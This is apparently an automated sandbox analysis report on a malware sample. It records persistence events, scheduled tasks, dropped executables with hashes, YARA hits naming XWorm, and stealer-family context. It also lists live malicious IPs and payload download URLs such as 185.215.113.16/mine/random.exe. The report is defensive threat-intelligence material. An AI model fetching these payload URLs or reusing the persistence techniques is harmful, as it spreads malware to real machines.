                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Execution Graph export aborted for target e44fda3216.exe, PID 1608 because there are no executed function
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                          • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                          • VT rate limit hit for: file.exe

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          17:44:00API Interceptor983x Sleep call for process: skotes.exe modified
                                                                                                                                          17:44:08API Interceptor321x Sleep call for process: 9LbUK15.exe modified
                                                                                                                                          17:44:11API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                          17:44:13API Interceptor297x Sleep call for process: Ele.exe modified
                                                                                                                                          17:44:14API Interceptor183x Sleep call for process: e44fda3216.exe modified
                                                                                                                                          17:44:20API Interceptor34x Sleep call for process: powershell.exe modified
                                                                                                                                          17:44:24API Interceptor1x Sleep call for process: pcqxl.exe modified
                                                                                                                                          17:44:27API Interceptor117x Sleep call for process: NzL6O1Q.exe modified
                                                                                                                                          22:43:05Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          22:44:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                                                                                                                                          22:44:23Task SchedulerRun new task: pcqxl path: C:\Users\user\AppData\Local\Temp\pcqxl.exe
                                                                                                                                          22:44:25Task SchedulerRun new task: NzL6O1Q path: C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                          22:44:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NzL6O1Q C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                          22:44:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NzL6O1Q C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                          22:44:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          185.215.113.43file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          Fi3ptS6O8D.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          mDuCbT8LnH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                          • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                          185.215.113.16file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                          • 185.215.113.16/mine/random.exe
                                                                                                                                          same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                                          • 185.215.113.16/mine/random.exe
                                                                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                          SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                                                          zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                                                          2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                                                          Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                          • 185.215.113.16/mine/random.exe
                                                                                                                                          bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                                                          UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                                                          l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16/off/def.exe

                                                                                                                                          Domains

                                                                                                                                          No context

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          AS-CHOOPAUSmiori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 44.175.18.157
                                                                                                                                          xmr new.exeGet hashmaliciousXmrigBrowse
                                                                                                                                          • 80.240.16.67
                                                                                                                                          eth.exeGet hashmaliciousXmrigBrowse
                                                                                                                                          • 192.248.189.11
                                                                                                                                          cZO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 108.61.189.74
                                                                                                                                          Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 149.253.168.94
                                                                                                                                          momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 137.220.48.181
                                                                                                                                          z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 45.32.45.161
                                                                                                                                          1.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 185.103.202.108
                                                                                                                                          3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 108.61.224.55
                                                                                                                                          8n26gvrXUM.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 144.202.34.112
                                                                                                                                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          Fi3ptS6O8D.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                          • 185.215.113.43
                                                                                                                                          random(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          random(6).exeGet hashmaliciousStealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          GITHUBUSCustomer.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • 140.82.121.4
                                                                                                                                          Solara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.82.121.4
                                                                                                                                          https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
                                                                                                                                          • 140.82.121.4
                                                                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 140.82.121.4
                                                                                                                                          ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          Fi3ptS6O8D.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                          • 185.215.113.43
                                                                                                                                          random(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          random(6).exeGet hashmaliciousStealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.206

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exeNzL6O1Q.exeGet hashmaliciousXWormBrowse

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x510caab9, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1310720
                                                                                                                                            Entropy (8bit):0.4221738383287941
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                                                                                                            MD5:405A716794B0A979E688FA0E5BBA0D9E
                                                                                                                                            SHA1:349FA920DE79B0499868E6E3F35862C96EDB79DB
                                                                                                                                            SHA-256:F1128D9D6DCC0F144ACFEEBB00596EE1533EE465F7190691536E489820130980
                                                                                                                                            SHA-512:9B96D83E24E4B22AFA9C9AA4DF4BC2EB84C81D45231509A6D2F1C5DE897BBDC98932879B8DBF63E487EC6D166EDFC645D94DB855B30EF3215432EECEA68E7790
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:Q...... .......A.......X\...;...{......................0.!..........{A..,...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................}...,...}.....................i.,...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\pcqxl.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2625536
                                                                                                                                            Entropy (8bit):6.537979655585314
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:5f0h+NftcnTMnrLafwGzMwGy95OkO42/h9C+hIXSlDFGI/MEEsdD/gVm:W+NfSYnAwGzfb5xO42ZailDREEEO
                                                                                                                                            MD5:382DC2CC6405B237FA73B03EF0B52327
                                                                                                                                            SHA1:1FD284AF02569B01C46F81C67E419305B1CF4628
                                                                                                                                            SHA-256:F5A2F62F2BAC02EAB7FD22D868C5FA5AB61B517BFECC5C251817B6F9020E73C2
                                                                                                                                            SHA-512:6AD4C1819F11ACD02DC8A3CCBD19E516DCC92C5DD53A9C2ECA935E8615FF7024DB14E3072B786468343EFFBE66479C65C139555500B904FC0E337ABAFD791DFC
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....jg.........."......p....'.....@..........@.............................p(...........`.................................................p...<............0(..............`(.x...............................(.......8...............X............................text....o.......p.................. ..`.rdata...............t..............@..@.data...p.'......v'.................@....pdata.......0(.......(.............@..@.00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....reloc..x....`(.......(.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Ele.exe.log

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                                                                                                                                            File Type:CSV text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):838
                                                                                                                                            Entropy (8bit):5.356471432431617
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
                                                                                                                                            MD5:E56A6A79CB531084A51F12C271BE7439
                                                                                                                                            SHA1:97A016CBE4C221936BAB8F76D33F7C021AA19ADF
                                                                                                                                            SHA-256:FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
                                                                                                                                            SHA-512:B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NzL6O1Q.exe.log

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            File Type:CSV text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1076
                                                                                                                                            Entropy (8bit):5.370431226217922
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6o6+vxp3/elStHTHhAHW
                                                                                                                                            MD5:D603D2ADCDCF6029A48173C1C7CE4BCB
                                                                                                                                            SHA1:CB3FDFD78704FE3877DA96B4D62638B3C28D73C7
                                                                                                                                            SHA-256:6358CA58034DFBCEFF0B7A53ACAF24FDEAD10AFCB48411183DE774732E5B7723
                                                                                                                                            SHA-512:C1682C6845011CE79A6BC53738E3A190B91695DAA48EA82EAFEFBE6E90F1DF4D9928A499D398B4932B7528228E76397CBAD4FF39F859AE7903BEB51451EE1B7D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.886585917020445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:IUkOZ0l/h1dhJIiBzqY0kj0BZK4BUbL0c5PJ7W7nRWr4Ih/VoxXL5ly2W+3W9usk:NbLGhKhjyNYsRnTBAtHzae6M
                                                                                                                                            MD5:86268AF17C4C5AFF970734EB5775A7F8
                                                                                                                                            SHA1:2C77E4720C8EB3AB8ACEF2E758B649D63FE16755
                                                                                                                                            SHA-256:6D8199A84B7256CF46B852E911221165C7FA044FBFC1642EF9ED24FFEE666470
                                                                                                                                            SHA-512:5443662D4A761FC77CBEE8883FF3677D7C1755DCA45D9F80440F211B1ECD19B695906B8A06027C980E5A5DC1B08010202E5653C63CC2658956D7D63F43BE65FF
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..J..........zh... ........@.. ....................................`.................................%h..O....................................g..8............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............h..............@..B................Yh......H........B...$......&....f..............................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0...........~.....+..*".(.....*Vs....(....t.........*...0..f.........}.....(........o.......o...... . ...(.......(.......( ....s....( ......(!.....rC..p"...As"...o#....*...0.............($.....(%....(&...s'.....((......ri..p(....o)......8Z......(*......(+.........9.............,G...ry..p(..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24997182
                                                                                                                                            Entropy (8bit):7.992307862787898
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:393216:hQvPJ/582VKol2VAkyoHf0O51u8MR5thr3woxkPnB/1isAlzKO4yFmE4RTdj0gNR:kPJmkpkAkhMKBorx3Lz/n4RTdIgEmSEr
                                                                                                                                            MD5:9D60674507EA97985C7E3B08D610F8D7
                                                                                                                                            SHA1:1FCCF49236815C14C5AE08ADB8D1B23846051B2D
                                                                                                                                            SHA-256:711CD08835ADD9FEECDD4AFCFB8DF8370FE98C22969FA2CB0CC010A8C8E25D12
                                                                                                                                            SHA-512:B841CD0C37171B666B8F03908B6643583D97625321F2017CAEBFB6C3F9B59ECB8F545586170D2467FE05C378E5411F1108CB3B4B53402661506FDD2F0F040DF6
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h.....................@.............................P............`.............................................4......P........8......l0...........@..p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc....8.......:..................@..@.reloc..p....@......."..............@..B........................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1967616
                                                                                                                                            Entropy (8bit):7.942586744122007
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:0Z7JUUPG9T4zOtKq2HydWyAjHWlP9O0C4drUzR4T+:0tPG9FXEyAEFtdrq4T+
                                                                                                                                            MD5:4F5013C5D4C13BCB3D9BB98AC601D056
                                                                                                                                            SHA1:8A4862EE54FAE9DF6AE6A8D2616B0D9D021B4FBD
                                                                                                                                            SHA-256:56DAFBBA12A48578DC834632CAA40DD7A96FA04FE04A7CAE87F60F960043C2D9
                                                                                                                                            SHA-512:CBFC65A34B1052E165677807F4A74AAEB7B14BF6E942CEAAF8B6CA2BF4F03DFD1878DEF3B31446E4910651971B3A3A4C0DE40120D2A57A0E67E1B232E9B3EA82
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................>....................@.........................................................................[.A.o.....@......................................................1...................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..*...A.....................@...irrkukjx......k.....................@...tvxezsde............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zjFtdxQ[1].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1714462
                                                                                                                                            Entropy (8bit):7.946301893129129
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:L1Dt9raflh10V8hT50WH3auKHab7SNudXjdTF:pDt9raT10VC5GOJF
                                                                                                                                            MD5:68D36FA633B4FB19D5C5B285C9A0B415
                                                                                                                                            SHA1:02A5E654832380CCEC23485DA0705DD2E748DA0C
                                                                                                                                            SHA-256:2670D23C86CF1D9B2CAEC5A61FF7D61E2D9FDB449531CAE509BB4F65D75C45C8
                                                                                                                                            SHA-512:5B250529C7092F7842260921789A12E4232B1CB4B80A188510EAC49BA0E96FEA64DCC7A588829FB009C926410126C4663BB831A62D003B96BC76FF5045785FCB
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....#=.................P...$......xd.......p....@.......................... ...................@..................................................................................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....LW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc................t..............@..@.....................&..............@..@........................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482304
                                                                                                                                            Entropy (8bit):3.1342365717789904
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4FAvjMvA4v2Oh9R8DZqYplTTiX5Ak6kGyR8W5lHbRAnEmmOJOh4Zg:NjMvA4fh9qDZqYOXYyRR5lb2nEQj
                                                                                                                                            MD5:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            SHA1:6DBA3A3B96225FE24229F1B39509A503547D1401
                                                                                                                                            SHA-256:B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                                                                                                                                            SHA-512:9DF54DF59FE341C0719C0D329DB4D2810DE385F133E210D6046DEB06F94BC3A3C5591A7E52906F91E93DAFB2ADC110021354FDA505B64A974274DC03E83ED4C9
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, Author: Joe Security
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, Author: Sekoia.io
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: NzL6O1Q.exe, Detection: malicious, Browse
